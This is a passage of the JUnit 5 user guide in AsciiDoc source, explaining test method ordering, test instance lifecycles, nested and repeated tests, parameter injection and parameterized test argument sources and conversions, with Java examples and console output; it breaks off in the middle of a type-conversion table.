where the sequence of the tests is important, especially in conjunction with
`@TestInstance(Lifecycle.PER_CLASS)`.

To control the order in which test methods are executed, annotate your test class or test
interface with `{TestMethodOrder}` and specify the desired `{MethodOrderer}`
implementation.
You can implement your own custom `MethodOrderer` or use one of the\nfollowing built-in `MethodOrderer` implementations.\n\n* `{Alphanumeric}`: sorts test methods _alphanumerically_ based on their names and formal\n parameter lists.\n* `{OrderAnnotation}`: sorts test methods _numerically_ based on values specified via the\n `{Order}` annotation.\n* `{Random}`: orders test methods _pseudo-randomly_ and supports configuration of a\n custom _seed_.\n\nThe following example demonstrates how to guarantee that test methods are executed in the\norder specified via the `@Order` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/OrderedTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-instance-lifecycle]]\n=== Test Instance Lifecycle\n\nIn order to allow individual test methods to be executed in isolation and to avoid\nunexpected side effects due to mutable test instance state, JUnit creates a new instance\nof each test class before executing each _test method_ (see\n<<writing-tests-classes-and-methods>>). This \"per-method\" test instance lifecycle is the\ndefault behavior in JUnit Jupiter and is analogous to all previous versions of JUnit.\n\nNOTE: Please note that the test class will still be instantiated if a given _test method_\nis _disabled_ via a <<writing-tests-conditional-execution,condition>> (e.g., `@Disabled`,\n`@DisabledOnOs`, etc.) even when the \"per-method\" test instance lifecycle mode is active.\n\nIf you would prefer that JUnit Jupiter execute all test methods on the same test\ninstance, annotate your test class with `@TestInstance(Lifecycle.PER_CLASS)`. When using\nthis mode, a new test instance will be created once per test class. Thus, if your test\nmethods rely on state stored in instance variables, you may need to reset that state in\n`@BeforeEach` or `@AfterEach` methods.\n\nThe \"per-class\" mode has some additional benefits over the default \"per-method\" mode.\nSpecifically, with the \"per-class\" mode it becomes possible to declare `@BeforeAll` and\n`@AfterAll` on non-static methods as well as on interface `default` methods. The\n\"per-class\" mode therefore also makes it possible to use `@BeforeAll` and `@AfterAll`\nmethods in `@Nested` test classes.\n\nIf you are authoring tests using the Kotlin programming language, you may also find it\neasier to implement `@BeforeAll` and `@AfterAll` methods by switching to the \"per-class\"\ntest instance lifecycle mode.\n\n[[writing-tests-test-instance-lifecycle-changing-default]]\n==== Changing the Default Test Instance Lifecycle\n\nIf a test class or test interface is not annotated with `@TestInstance`, JUnit Jupiter\nwill use a _default_ lifecycle mode. The standard _default_ mode is `PER_METHOD`;\nhowever, it is possible to change the _default_ for the execution of an entire test plan.\nTo change the default test instance lifecycle mode, set the\n`junit.jupiter.testinstance.lifecycle.default` _configuration parameter_ to the name of\nan enum constant defined in `TestInstance.Lifecycle`, ignoring case. 
This can be supplied
as a JVM system property, as a _configuration parameter_ in the
`LauncherDiscoveryRequest` that is passed to the `Launcher`, or via the JUnit Platform
configuration file (see <<running-tests-config-params>> for details).

For example, to set the default test instance lifecycle mode to `Lifecycle.PER_CLASS`,
you can start your JVM with the following system property.

`-Djunit.jupiter.testinstance.lifecycle.default=per_class`

Note, however, that setting the default test instance lifecycle mode via the JUnit
Platform configuration file is a more robust solution since the configuration file can be
checked into a version control system along with your project and can therefore be used
within IDEs and your build software.

To set the default test instance lifecycle mode to `Lifecycle.PER_CLASS` via the JUnit
Platform configuration file, create a file named `junit-platform.properties` in the root
of the class path (e.g., `src/test/resources`) with the following content.

`junit.jupiter.testinstance.lifecycle.default = per_class`

WARNING: Changing the _default_ test instance lifecycle mode can lead to unpredictable
results and fragile builds if not applied consistently. For example, if the build
configures "per-class" semantics as the default but tests in the IDE are executed using
"per-method" semantics, that can make it difficult to debug errors that occur on the
build server. It is therefore recommended to change the default in the JUnit Platform
configuration file instead of via a JVM system property.

[[writing-tests-nested]]
=== Nested Tests

Nested tests give the test writer more capabilities to express the relationship among
several groups of tests. Here's an elaborate example.

[source,java,indent=0]
.Nested test suite for testing a stack
----
include::{testDir}/example/TestingAStackDemo.java[tags=user_guide]
----

NOTE: _Only non-static nested classes_ (i.e., _inner classes_) can serve as `@Nested` test
classes. Nesting can be arbitrarily deep, and those inner classes are considered to be
full members of the test class family with one exception: `@BeforeAll` and `@AfterAll`
methods do not work _by default_. The reason is that Java does not allow `static` members
in inner classes. However, this restriction can be circumvented by annotating a `@Nested`
test class with `@TestInstance(Lifecycle.PER_CLASS)` (see
<<writing-tests-test-instance-lifecycle>>).

[[writing-tests-dependency-injection]]
=== Dependency Injection for Constructors and Methods

In all prior JUnit versions, test constructors or methods were not allowed to have
parameters (at least not with the standard `Runner` implementations). As one of the major
changes in JUnit Jupiter, both test constructors and methods are now permitted to have
parameters. This allows for greater flexibility and enables _Dependency Injection_ for
constructors and methods.

`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_
resolve parameters at runtime.
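For reference, the extension point itself is a small, two-method interface; the
following reflects its essential shape (consult the `org.junit.jupiter.api.extension`
Javadoc for the authoritative declaration):

[source,java,indent=0]
----
public interface ParameterResolver extends Extension {

	// Decides whether this resolver can supply a value for the given parameter.
	boolean supportsParameter(ParameterContext parameterContext,
			ExtensionContext extensionContext) throws ParameterResolutionException;

	// Supplies the actual argument for a parameter it previously claimed to support.
	Object resolveParameter(ParameterContext parameterContext,
			ExtensionContext extensionContext) throws ParameterResolutionException;
}
----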
If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `{RepetitionInfoParameterResolver}`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`,\n the `TestReporterParameterResolver` will supply an instance of `TestReporter`. The\n `TestReporter` can be used to publish additional data about the current test run. The\n data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and\n thus be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where you used to print information to\n`stdout` or `stderr` in JUnit 4. Using `@RunWith(JUnitPlatform.class)` will even output\nall reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{RandomParametersExtension}` for an example of a custom\n`{ParameterResolver}`. While not intended to be production-ready, it demonstrates the\nsimplicity and expressiveness of both the extension model and the parameter resolution\nprocess. 
`MyRandomParametersTest` demonstrates how to inject random values into `@Test`\nmethods.\n\n[source,java,indent=0]\n----\n@ExtendWith(RandomParametersExtension.class)\nclass MyRandomParametersTest {\n\n\t@Test\n\tvoid injectsInteger(@Random int i, @Random int j) {\n\t\tassertNotEquals(i, j);\n\t}\n\n\t@Test\n\tvoid injectsDouble(@Random double d) {\n\t\tassertEquals(0.0, d, 1.0);\n\t}\n\n}\n----\n\nFor real-world use cases, check out the source code for the `{MockitoExtension}` and the\n`{SpringExtension}`.\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`,\n`@TestTemplate`, `@BeforeEach`, and `@AfterEach` to be declared on interface `default`\nmethods. `@BeforeAll` and `@AfterAll` can either be declared on `static` methods in a\ntest interface or on interface `default` methods _if_ the test interface or test class is\nannotated with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>). Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement the interface automatically inherit its tags and extensions. See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsForPalindromes()]\nINFO example.TimingExtension - Method [dynamicTestsForPalindromes] took 19 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsForPalindromes()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. 
Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nNOTE: The above tests are merely meant as examples and are therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to the example from the previous section; whereas,\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`, as the following sketch illustrates.
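\n\nA sketch of how such a method could be declared follows; the authoritative source is the\n`RepeatedTestsDemo` class at the end of this section.\n\n[source,java,indent=0]\n----\n@RepeatedTest(value = 1, name = \"{displayName} {currentRepetition}\/{totalRepetitions}\")\n@DisplayName(\"Repeat!\")\nvoid customDisplayName(TestInfo testInfo) {\n\tassertEquals(\"Repeat! 1\/1\", testInfo.getDisplayName());\n}\n----\n\n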
In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach` it will get executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` with the unicode theme enabled, execution of\n`RepeatedTestsDemo` results in the following output to the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 
1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different\narguments. They are declared just like regular `@Test` methods but use the\n`{ParameterizedTest}` annotation instead. In addition, you must declare at least one\n_source_ that will provide the arguments for each invocation and then _consume_ the\narguments in the test method.\n\nThe following example demonstrates a parameterized test that uses the `@ValueSource`\nannotation to specify a `String` array as the source of arguments.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nWhen executing the above parameterized test method, each invocation will be reported\nseparately. For instance, the `ConsoleLauncher` will print output similar to the\nfollowing.\n\n....\npalindromes(String) \u2714\n\u251c\u2500 [1] racecar \u2714\n\u251c\u2500 [2] radar \u2714\n\u2514\u2500 [3] able was I ere I saw elba \u2714\n....\n\nWARNING: Parameterized tests are currently an _experimental_ feature. Consult the table\nin <<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests you need to add a dependency on the\n`junit-jupiter-params` artifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-consuming-arguments]]\n==== Consuming Arguments\n\nParameterized test methods typically _consume_ arguments directly from the configured\nsource (see <<writing-tests-parameterized-tests-sources>>) following a one-to-one\ncorrelation between argument source index and method parameter index (see examples in\n<<writing-tests-parameterized-tests-sources-CsvSource>>). However, a parameterized test\nmethod may also choose to _aggregate_ arguments from the source into a single object\npassed to the method (see <<writing-tests-parameterized-tests-argument-aggregation>>).\nAdditional arguments may also be provided by a `ParameterResolver` (e.g., to obtain an\ninstance of `TestInfo`, `TestReporter`, etc.). Specifically, a parameterized test method\nmust declare formal parameters according to the following rules.\n\n* Zero or more _indexed arguments_ must be declared first.\n* Zero or more _aggregators_ must be declared next.\n* Zero or more arguments supplied by a `ParameterResolver` must be declared last.\n\nIn this context, an _indexed argument_ is an argument for a given index in the\n`Arguments` provided by an `ArgumentsProvider` that is passed as an argument to the\nparameterized method at the same index in the method's formal parameter list. An\n_aggregator_ is any parameter of type `ArgumentsAccessor` or any parameter annotated with\n`@AggregateWith`.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. 
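\n\nBefore looking at the individual sources, here is a hedged sketch of a signature that\nfollows the ordering rules above: two indexed arguments come first, and a `TestInfo`\nsupplied by its `ParameterResolver` comes last (the method and parameter names are\nillustrative).\n\n[source,java,indent=0]\n----\n@ParameterizedTest\n@CsvSource({ \"apple, 1\", \"banana, 2\" })\nvoid testWithIndexedArgumentsAndTestInfo(String fruit, int rank, TestInfo testInfo) {\n\t\/\/ fruit and rank are indexed arguments supplied by @CsvSource;\n\t\/\/ testInfo is appended by the built-in TestInfoParameterResolver\n\tassertTrue(rank > 0);\n\tassertNotNull(testInfo.getDisplayName());\n}\n----\n\n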
Please\nrefer to the Javadoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify a single\narray of literal values and can only be used for providing a single argument per\nparameterized test invocation.\n\nThe following types of literal values are supported by `@ValueSource`.\n\n- `short`\n- `byte`\n- `int`\n- `long`\n- `float`\n- `double`\n- `char`\n- `java.lang.String`\n- `java.lang.Class`\n\nFor example, the following `@ParameterizedTest` method will be invoked three times, with\nthe values `1`, `2`, and `3` respectively.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides\nan optional `names` parameter that lets you specify which constants shall be used. If\nomitted, all constants will be used like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`{MethodSource}` allows you to refer to one or more _factory_ methods of the test class\nor external classes.\n\nFactory methods within the test class must be `static` unless the test class is annotated\nwith `@TestInstance(Lifecycle.PER_CLASS)`; whereas, factory methods in external classes\nmust always be `static`. In addition, such factory methods must not accept any arguments.\n\nEach factory method must generate a _stream_ of _arguments_, and each set of arguments\nwithin the stream will be provided as the physical arguments for individual invocations\nof the annotated `@ParameterizedTest` method. Generally speaking this translates to a\n`Stream` of `Arguments` (i.e., `Stream<Arguments>`); however, the actual concrete return\ntype can take on many forms. In this context, a \"stream\" is anything that JUnit can\nreliably convert into a `Stream`, such as `Stream`, `DoubleStream`, `LongStream`,\n`IntStream`, `Collection`, `Iterator`, `Iterable`, an array of objects, or an array of\nprimitives. 
The \"arguments\" within the stream can be supplied as an instance of\n`Arguments`, an array of objects (e.g., `Object[]`), or a single value if the\nparameterized test method accepts a single argument.\n\nIf you only need a single parameter, you can return a `Stream` of instances of the\nparameter type as demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nIf you do not explicitly provide a factory method name via `@MethodSource`, JUnit Jupiter\nwill search for a _factory_ method that has the same name as the current\n`@ParameterizedTest` method by convention. This is demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_without_value_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also\nsupported as demonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIf a parameterized test method declares multiple parameters, you need to return a\ncollection, stream, or array of `Arguments` instances or object arrays as shown below\n(see the Javadoc for `{MethodSource}` for further details on supported return types).\nNote that `arguments(Object...)` is a static factory method defined in the `Arguments`\ninterface. In addition, `Arguments.of(Object...)` may be used as an alternative to\n`arguments(Object...)`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\nAn external, `static` _factory_ method can be referenced by providing its _fully\nqualified method name_ as demonstrated in the following example.\n\n[source,java,indent=0]\n----\npackage example;\n\ninclude::{testDir}\/example\/ExternalMethodSourceDemo.java[tags=external_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n`@CsvSource` uses a single quote `'` as its quote character. See the `'baz, qux'` value\nin the example above and in the table below. An empty, quoted value `''` results in an\nempty `String`; whereas, an entirely _empty_ value is interpreted as a `null` reference.\nAn `ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[cols=\"50,50\"]\n|===\n| Example Input | Resulting Argument List\n\n| `@CsvSource({ \"foo, bar\" })` | `\"foo\"`, `\"bar\"`\n| `@CsvSource({ \"foo, 'baz, qux'\" })` | `\"foo\"`, `\"baz, qux\"`\n| `@CsvSource({ \"foo, ''\" })` | `\"foo\"`, `\"\"`\n| `@CsvSource({ \"foo, \" })` | `\"foo\"`, `null`\n|===\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. 
Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\nNOTE: In contrast to the syntax used in `@CsvSource`, `@CsvFileSource` uses a double\nquote `\"` as the quote character. See the `\"United States of America\"` value in the\nexample above. An empty, quoted value `\"\"` results in an empty `String`; whereas, an\nentirely _empty_ value is interpreted as a `null` reference. An\n`ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`. Note\nthat an implementation of `ArgumentsProvider` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsProvider_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-widening]]\n===== Widening Conversion\n\nJUnit Jupiter supports\nhttps:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/jls-5.html#jls-5.1.2[Widening Primitive\nConversion] for arguments supplied to a `@ParameterizedTest`. For example, a\nparameterized test annotated with `@ValueSource(ints = { 1, 2, 3 })` can be declared to\naccept not only an argument of type `int` but also an argument of type `long`, `float`,\nor `double`.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in\nimplicit type converters. 
The conversion process depends on the declared type of each\nmethod parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will be\nautomatically converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are implicitly converted to the following target types.\n\nNOTE: Decimal, hexadecimal, and octal `String` literals will be converted to their\nintegral types: `byte`, `short`, `int`, `long`, and their boxed counterparts.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-table]]\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` -> `true`\n| `byte`\/`Byte` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(byte) 15`\n| `char`\/`Character` | `\"o\"` -> `'o'`\n| `short`\/`Short` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(short) 15`\n| `int`\/`Integer` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15`\n| `long`\/`Long` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15L`\n| `float`\/`Float` | `\"1.0\"` -> `1.0f`\n| `double`\/`Double` | `\"1.0\"` -> `1.0d`\n| `Enum` subclass | `\"SECONDS\"` -> `TimeUnit.SECONDS`\n| `java.io.File` | `\"\/path\/to\/file\"` -> `new File(\"\/path\/to\/file\")`\n| `java.lang.Class` | `\"java.lang.Integer\"` -> `java.lang.Integer.class` _(use `$` for nested classes, e.g. `\"java.lang.Thread$State\"`)_\n| `java.lang.Class` | `\"byte\"` -> `byte.class` _(primitive types are supported)_\n| `java.lang.Class` | `\"char[]\"` -> `char[].class` _(array types are supported)_\n| `java.math.BigDecimal` | `\"123.456e789\"` -> `new BigDecimal(\"123.456e789\")`\n| `java.math.BigInteger` | `\"1234567890123456789\"` -> `new BigInteger(\"1234567890123456789\")`\n| `java.net.URI` | `\"http:\/\/junit.org\/\"` -> `URI.create(\"http:\/\/junit.org\/\")`\n| `java.net.URL` | `\"http:\/\/junit.org\/\"` -> `new URL(\"http:\/\/junit.org\/\")`\n| `java.nio.charset.Charset` | `\"UTF-8\"` -> `Charset.forName(\"UTF-8\")`\n| `java.nio.file.Path` | 